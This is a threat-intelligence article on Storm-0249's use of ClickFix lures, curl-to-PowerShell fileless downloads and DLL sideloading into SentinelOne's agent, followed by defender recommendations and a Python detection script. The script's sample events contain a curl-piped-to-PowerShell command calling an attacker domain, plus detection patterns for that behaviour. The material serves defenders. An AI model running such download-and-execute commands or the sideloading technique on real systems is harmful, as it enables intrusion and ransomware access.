A significant evolution in the tactics of the Initial Access Broker (IAB) "Storm-0249" has been identified in new research released by ReliaQuest. The threat intelligence firm reports that this financially motivated group, historically known for mass phishing campaigns, has pivoted toward a highly surgical post-exploitation strategy.

According to the analysis, Storm-0249 is now weaponizing legitimate Endpoint Detection and Response (EDR) processes—specifically SentinelOne's SentinelAgentWorker.exe—to mask malicious activity. By abusing the trust inherent in signed security binaries, the group effectively bypasses traditional detection, securing a foothold for ransomware affiliates. This report examines the technical findings from ReliaQuest and the implications for defense teams.

Technical Analysis: The Storm-0249 Attack Chain

The ReliaQuest threat research team mapped a distinct attack chain that relies heavily on "living off the land" (LotL) techniques and the abuse of trusted software. The investigation highlights a shift from volume-based attacks to precision evasion. The observed kill chain proceeds as follows:

  1. Initial Compromise (ClickFix): The attack initiates via social engineering. Users encounter a "ClickFix" lure—a fraudulent prompt on a phishing site (e.g., sgcipl[.]com) that mimics a Microsoft support page and instructs the user to run a "fix" command.
  2. Ingress via Native Tools: The user unknowingly executes curl.exe, a utility that ships with current Windows releases. ReliaQuest telemetry shows the attackers using this tool to retrieve a payload from attacker-controlled infrastructure whose URL path (/us.microsoft.com/) is crafted to resemble a Microsoft subdirectory.
  3. In-Memory Execution: The curl command pipes the downloaded script directly into PowerShell memory. This fileless execution method avoids writing the initial script to the disk, evading static file scanners.
  4. Privilege Escalation: The attackers deploy a malicious MSI package. This installer abuses Windows Installer privileges to execute with SYSTEM-level access, granting the necessary permissions to write files to protected system folders.
  5. The Sideloading Setup: The MSI drops a legitimate, signed copy of SentinelAgentWorker.exe into the user’s AppData folder. Crucially, a malicious DLL named SentinelAgentCore.dll is placed alongside it.
  6. Execution: When the legitimate SentinelOne executable launches, it unwittingly loads the local, malicious DLL instead of the system version. This executes the attacker's code under the identity of a trusted security process.

Novel Tooling and Indicators of Compromise (IoCs)

The report identifies several specific artifacts that security teams can use to hunt for this activity. ReliaQuest emphasizes that while the technique targets SentinelOne, the weakness lies in how Windows resolves DLLs, not in the SentinelOne platform itself: when a library is requested by name, the loader checks the executable's own directory before the system directories, so a DLL planted beside a copied binary is the one that gets loaded.

Key Technical Artifacts:

  • Abused Binary: SentinelAgentWorker.exe (Legitimate file used as a host).
  • Malicious Library: SentinelAgentCore.dll (The payload containing the attacker's logic).
  • Network Indicators: Connections to sgcipl[.]com or hristomasitomasdf[.]com.
  • Command Lines: Evidence of curl.exe piping output to powershell.exe, followed by the execution of reg.exe and findstr.exe originating from the SentinelOne process.

Hiding in Plain Sight: Command and Control Evasion

A critical finding in the ReliaQuest report is the method Storm-0249 uses to conceal Command and Control (C2) traffic. By sideloading their code into SentinelAgentWorker.exe, the attackers force the legitimate security agent to handle their network communications.

Network monitoring tools generally whitelist traffic from signed EDR agents, expecting frequent, encrypted communication with cloud management consoles. Storm-0249 exploits this trust. The malicious traffic is encrypted via Transport Layer Security (TLS), blending seamlessly with genuine telemetry.

The researchers note that this renders Deep Packet Inspection (DPI) largely ineffective, as the traffic appears to be routine security operations. Furthermore, the group employs "disposable infrastructure," registering C2 domains mere weeks before an attack to bypass reputation-based filtering systems that flag older or known-bad domains.

Essential Recommendations for Defenders

Based on the tactics observed by ReliaQuest, organizations should prioritize behavioral monitoring over static signatures. The following steps are recommended to counter these evasion techniques:

  • Behavioral Anomaly Detection: Configure EDR and SIEM rules to alert when signed security binaries (like SentinelOne) load unsigned or unexpected DLLs, particularly from user-writable directories like %AppData%.
  • Restrict curl Usage: Monitor or block instances where curl.exe pipes data directly to PowerShell or CMD. This behavior is rare in legitimate administrative workflows and is a high-fidelity indicator of compromise.
  • DNS Monitoring: Scrutinize outbound connections to domains registered within the last 30 to 90 days, especially if the connection originates from a trusted process.
  • Isolate on Reconnaissance: Automate host isolation if SentinelAgentWorker.exe (or any security agent) attempts to spawn reg.exe or findstr.exe. This is a clear deviation from normal agent behavior.
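The four recommendations above, plus the disposable-infrastructure finding from the C2 section, can be expressed as behavioral rules over process, image-load and network telemetry. The script below is an added example written for this article, not code from ReliaQuest or SentinelOne: it assumes a simplified event schema (a dict per event with a type of process_create, image_load or net_connect), a domain-registration table that in practice would come from WHOIS/RDAP enrichment, and constructed sample events that mirror the chain described above. The registration dates, user paths and the PLACEHOLDER URL path are all made up for the example.

```python
"""Behavioral detections for the recommendations above, evaluated over
constructed sample telemetry. Added example, not ReliaQuest or SentinelOne code."""
import re
from dataclasses import dataclass
from datetime import date

# Signed security-agent image names to baseline. The report names only the
# SentinelOne worker; add the agents deployed in your own estate here.
SECURITY_AGENTS = {"sentinelagentworker.exe"}

# Path fragments marking user-writable locations (lower-case, backslash form).
USER_WRITABLE = ("\\appdata\\", "\\users\\public\\", "\\temp\\", "\\programdata\\")

# Reconnaissance tools an EDR agent has no reason to spawn.
RECON_CHILDREN = {"reg.exe", "findstr.exe"}

# curl output piped straight into a shell interpreter.
CURL_PIPE = re.compile(r"\bcurl(\.exe)?\b.*\|\s*(powershell|pwsh|cmd)(\.exe)?\b", re.I)

MAX_DOMAIN_AGE_DAYS = 90  # the article suggests a 30 to 90 day window

ACTION_RANK = ["review", "investigate", "block", "isolate_host"]


@dataclass
class Alert:
    rule: str
    severity: str
    action: str
    detail: str


def win_path(p):
    """Normalise a path to lower-case backslash form."""
    return p.replace("/", "\\").lower()


def basename(p):
    return win_path(p).rsplit("\\", 1)[-1]


def refang(domain):
    """Accept defanged IoCs exactly as printed in reports, e.g. sgcipl[.]com."""
    return domain.lower().replace("[.]", ".")


def evaluate(events, domain_registered, today):
    """Run every rule over the event list and return the alerts that fired."""
    alerts = []
    for ev in events:
        t = ev["type"]
        if t == "image_load":
            proc, dll = basename(ev["process"]), win_path(ev["dll"])
            unsigned = not ev.get("dll_signed", False)
            writable = any(frag in dll for frag in USER_WRITABLE)
            # Rule 1: a signed agent loading an unsigned DLL or one from a user-writable path
            if proc in SECURITY_AGENTS and (unsigned or writable):
                alerts.append(Alert("signed_agent_loads_untrusted_dll", "high", "investigate",
                                    f"{proc} loaded {ev['dll']} signed={not unsigned}"))
        elif t == "process_create":
            cmd = ev.get("cmdline", "")
            # Rule 2: curl output piped into PowerShell or CMD
            if CURL_PIPE.search(cmd):
                alerts.append(Alert("curl_piped_to_shell", "high", "block", cmd))
            parent, child = basename(ev.get("parent", "")), basename(ev["image"])
            # Rule 4: a security agent spawning reg.exe or findstr.exe
            if parent in SECURITY_AGENTS and child in RECON_CHILDREN:
                alerts.append(Alert("security_agent_spawns_recon", "critical", "isolate_host",
                                    f"{parent} spawned {child}"))
        elif t == "net_connect":
            proc, dom = basename(ev["process"]), refang(ev["domain"])
            registered = domain_registered.get(dom)
            if registered is None:
                continue  # no registration data: enrich via WHOIS/RDAP before deciding
            age = (today - registered).days
            # Rule 3: recently registered domain, weighted up when a trusted process calls out
            if age <= MAX_DOMAIN_AGE_DAYS:
                trusted = proc in SECURITY_AGENTS
                alerts.append(Alert("young_domain_contacted",
                                    "high" if trusted else "medium",
                                    "investigate" if trusted else "review",
                                    f"{proc} -> {dom} registered {age} days ago"))
    return alerts


def recommended_action(alerts):
    """Most severe response across all alerts, or None when nothing fired."""
    if not alerts:
        return None
    return max((a.action for a in alerts), key=ACTION_RANK.index)


# ---- constructed sample telemetry (not real logs) ----
AGENT_IN_APPDATA = "C:\\Users\\alice\\AppData\\Roaming\\Sentinel\\SentinelAgentWorker.exe"
SAMPLE_TODAY = date(2025, 3, 1)
SAMPLE_REGISTRATIONS = {"sgcipl.com": date(2025, 2, 8), "example.com": date(1995, 8, 14)}
SAMPLE_EVENTS = [
    {"type": "image_load", "process": "C:\\Program Files\\SentinelOne\\SentinelAgentWorker.exe",
     "dll": "C:\\Windows\\System32\\kernel32.dll", "dll_signed": True},  # benign load
    {"type": "process_create", "image": "C:\\Windows\\System32\\cmd.exe",
     "parent": "C:\\Windows\\explorer.exe",
     "cmdline": "cmd /c curl -s https://sgcipl.com/us.microsoft.com/PLACEHOLDER | powershell -"},
    {"type": "image_load", "process": AGENT_IN_APPDATA, "dll_signed": False,
     "dll": "C:\\Users\\alice\\AppData\\Roaming\\Sentinel\\SentinelAgentCore.dll"},
    {"type": "process_create", "image": "C:\\Windows\\System32\\reg.exe",
     "parent": AGENT_IN_APPDATA, "cmdline": "reg query HKLM\\SYSTEM\\CurrentControlSet"},
    {"type": "net_connect", "process": AGENT_IN_APPDATA, "domain": "sgcipl[.]com"},
    {"type": "net_connect", "process": AGENT_IN_APPDATA, "domain": "example.com"},  # old domain
]

if __name__ == "__main__":
    found = evaluate(SAMPLE_EVENTS, SAMPLE_REGISTRATIONS, SAMPLE_TODAY)
    for a in found:
        print(f"[{a.severity}] {a.rule}: {a.detail} -> {a.action}")
    print("recommended action:", recommended_action(found))
```

Run against the sample events, the benign kernel32.dll load and the connection to a long-registered domain stay quiet, while the curl pipe, the AppData sideload, the reg.exe child and the young-domain callout each fire; the highest-ranked action is host isolation, matching the "Isolate on Reconnaissance" recommendation. The domain-age rule deliberately skips domains with no registration data rather than guessing, so enrichment coverage directly limits what it can see.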

Methodology & Attribution

The technical details and telemetry data in this article are derived from ReliaQuest's "Threat Spotlight: Storm-0249 Moves from Mass Phishing to Precision EDR Exploitation." The analysis was conducted by the ReliaQuest Threat Research Team, who worked in conjunction with SentinelOne to validate the findings. The research underscores the importance of monitoring trusted processes for anomalous behavior.

Conclusion

Storm-0249’s shift toward "living off the trusted" tactics represents a sophisticated escalation in the cybercrime ecosystem. As highlighted by the ReliaQuest findings, the ability to commoditize access that is pre-staged with SYSTEM privileges and persistence mechanisms makes this group a valuable enabler for ransomware affiliates. Security leaders must recognize that trusting digital signatures is no longer sufficient; defense strategies must evolve to scrutinize the behavior of trusted applications as rigorously as they do unknown threats.

Access ReliaQuest's complete technical analysis, indicators of compromise, and sector-specific threat breakdowns in the full report below.
